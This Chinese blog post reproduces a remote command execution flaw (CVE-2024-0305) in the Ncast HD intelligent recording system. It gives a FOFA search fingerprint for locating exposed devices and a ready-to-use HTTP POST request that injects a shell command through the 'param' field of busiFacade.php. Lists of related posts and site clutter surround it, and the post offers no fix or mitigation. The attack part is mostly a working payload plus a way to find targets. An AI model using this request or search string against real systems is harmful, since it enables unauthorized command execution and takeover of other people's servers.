Ncast盈可视高清智能录播系统存在RCE漏洞(CVE-2024-0305)

已于 2024-03-15 15:36:37 修改
阅读量450 收藏 6
点赞数 7
文章标签: 安全 web安全
于 2024-03-15 15:32:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wan___she__pi/article/details/136741128
版权

漏洞描述:

Ncast盈可视录播系统存在命令执行漏洞,攻击者可利用此漏洞进行任意命令执行,通过漏洞攻击者可获取服务器权限。

资产搜索:

fofa: icon_hash="-1253433910"

 漏洞复现:

POST /classes/common/busiFacade.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Firefox/121.0
Connection: close
Content-Length: 104
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest


{"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | whoami"]}

cn_大腿
关注
  • 7
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Ncast可视 高清智能录播系统 IPSetup.php信息泄露+RCE漏洞复现(CVE-2024-0305)
0xSec
01-10 1369
广州科电子技术Ncast可视 高清智能录播系统可通过访客身份访问/manage/IPSetup.php后台功能模块,攻击者可以利用该逻辑缺陷查看后台配置信息造成信息泄露,使用网络诊断功能模块可实现未授权远程命令执行,导致服务器失陷被控。
漏洞复现】Ncast可视-高清智能录播系统-IPSetup.php-RCE漏洞
知黑而守白
01-10 299
Ncast是一家专注于多媒体通信、视音频编解码、智能图像处理三大领域的产品研发以及优秀互联网服务的高新科技企业。可视电子坚持自主创新,已开发出多项具有自主知识产权的创新性产品,可视电子产品包括:高清多媒体录播系统、图像识别跟踪系统、图像点击跟踪系统、视频互动系统、数字告示系统。Ncast可视-高清智能录播系统可通过访客身份未授权访问 /manage/IPSetup.php 后台功能模块,攻击者可以利用该漏洞查看后台配置信息造成信息泄露,使用网络诊断功能模块可实现未授权远程命令执行,导致服务器失陷被控。
Ncast盛可视 CVE-2024-0305 远程命令执行漏洞复现
m0_64366018的博客
01-18 640
抓包,构造payload。
Ncast可视高清智能录播系统busiFacade RCE漏洞(CVE-2024-0305)
Keepb1ue的博客
01-12 967
Ncast可视高清智能录播系统是一套新进的音视频录制和播放系统,旨在提供高质量,高清定制的录播功能。
likeshop开源免费商用电商系统存在任意文件上传漏洞CVE-2024-0352
nnn2188185的博客
01-17 339
likeshop开源免费商用电商系统存在任意文件上传漏洞CVE-2024-0352
漏洞复现】Ncast可视-高清智能录播系统-远程命令执行-IPSetup
知黑而守白
06-20 27
可视电子是一家专注于多媒体通信、视音频编解码、智能图像处理三大领域的产品研发以及优秀互联网服务的高新科技企业。可视电子坚持自主创新,已开发出多项具有自主知识产权的创新性产品,可视电子产品包括:高清多媒体录播系统、图像识别跟踪系统、图像点击跟踪系统、视频互动系统、数字告示系统。Ncast可视-高清智能录播系统可通过访客身份未授权访问 /manage/IPSetup.php 后台功能模块,攻击者可以利用该漏洞查看后台配置信息造成信息泄露,使用网络诊断功能模块可实现未授权远程命令执行,导致服务器失陷被控。
Ncast_ADPRO6_智能录播解决方案.doc
06-16
Ncast_ADPRO6_智能录播解决方案
NCast:NCast C# SSDP 发现和内容投射 - Google Chromecast
06-14
NCast C# SSDP 发现和内容投射。 目前支持 LG TV 和 Google Chromecast 等渲染器。 public SSDPDiscovery Discovery = new SSDPDiscovery (); // Setup the event when a device is discovered Discovery . ...
Bens software projects.-开源
04-27
我的项目的主页:userinfo,pwmd,libpwmd,cboard,ncast,ezxradio和bubblegum。 还有VIM和EPIC脚本等代码片段。
单位视频会议扩展方案.doc
09-16
- **高清录播系统**:NCAST NP-S3P 高清录播系统标准 B 版是一款专业级的录播设备,支持多路高清视频输入,具备智能跟踪、切换和录制功能。 - **其他设备**:根据实际需求,可能还包括高分辨率的投影仪或显示屏、...
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1377
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
网络安全之扫描探测阶段攻防手段(二)
子非渔
07-24 824
扫描探测阶段是攻击者对目标网络进行深入了解的关键步骤,同时也是防御者识别潜在威胁和加强安全防护的机会。
WEB安全】 PHP基础完整教学上(超详细)
weixin_60838266的博客
07-28 726
本文为Web安全学习中需要了解的php知识提高学习,PHP:Hypertext Preprocessor,中文名:“超文本预处理器”是一种通用开源脚本语言。语法吸收了C语言、java和Perl的特点,利于学习,使用广泛,主要适用于web开发领域。用PHP做出的动态页面与其他的编程语言相比,PHP是将程序嵌入到HTML(标准通用标记语言下的一个应用)文档中去执行,执行效率比完全生成HTML标记的CGI要高许多;PHP还可以执行编译后代码,编译可以达到加密和优化代码运行,使代码运行更快。
WEB安全】 PHP基础文件知识完整教学中(超详细)
weixin_60838266的博客
07-29 608
正则表达式是用于描述字符排列和匹配模式的一种语法规则。它主要用于字符串的模式分割、匹配、查找及替换操作。到目前为止,我们前面所用过的精确(文本)匹配也是一种正则表达式。在PHP中,正则表达式一般是由正规字符和一些特殊字符(类似于通配符)联合构成的一个文本模式的程序性描述。正则表达式较重要和较有用的角色是验证用户数据的有效性检查。PHP中,正则表达式有三个作用:匹配,也常常用于从字符串中析取信息。用新文本代替匹配文本。将一个字符串拆分为一组更小的信息块。
网络安全相关竞赛比赛
黑战士的博客
07-18 1485
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
网络安全防御【IPsec VPN搭建】
miss_copper的博客
07-25 1361
防火墙的g0/0/0口默认的IP地址为192.168.0.1/24;但是我们需要在浏览器中打开FW2的web服务就需要将g0/0/0接口的IP地址修改为192.168.142.40/24与我们Clound中虚拟网卡通一个网段才行。20、将双机热备改成主备模式,通过内网的VPN设备构建一条到达分公司的IPsec VPN通道,保证10.0.2.0/24网段可以访问到192.168.1.0/24网段。登录成功之后需要修改你的密码才能进入防火墙的用户视图。IPsec策略协商成功!成功修改为主备模式!
网络安全之不同阶段攻防手段(四)
子非渔
07-25 620
前面已经说过信息收集、扫描探测以及初始访问阶段的攻防手段,下面将说一下在攻击者获取到访问权限的情况下会接着如何进一步在网络中建立控制点、提权、横移以及完成攻击后的遗迹隐藏
2024浙江省行政区划矢量图层-省市县乡镇四级行政区划数据下载-带python代码
最新发布
08-02
2024最新浙江省行政区划矢量图层数据,包含省、市、县、乡镇四级行政区划数据下载,附带shp转geojson的python代码
ObjectArx自定义对象编程指南
例如,`ndesc()`静态成员函数返回类的类描述符对象,`ncast()`用于将对象转换为指定类型,`nisKindOf()`检查对象是否属于某个类或其派生类,`nisA()`则返回未知类对象的类描述符。这些函数在处理自定义对象时非常...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值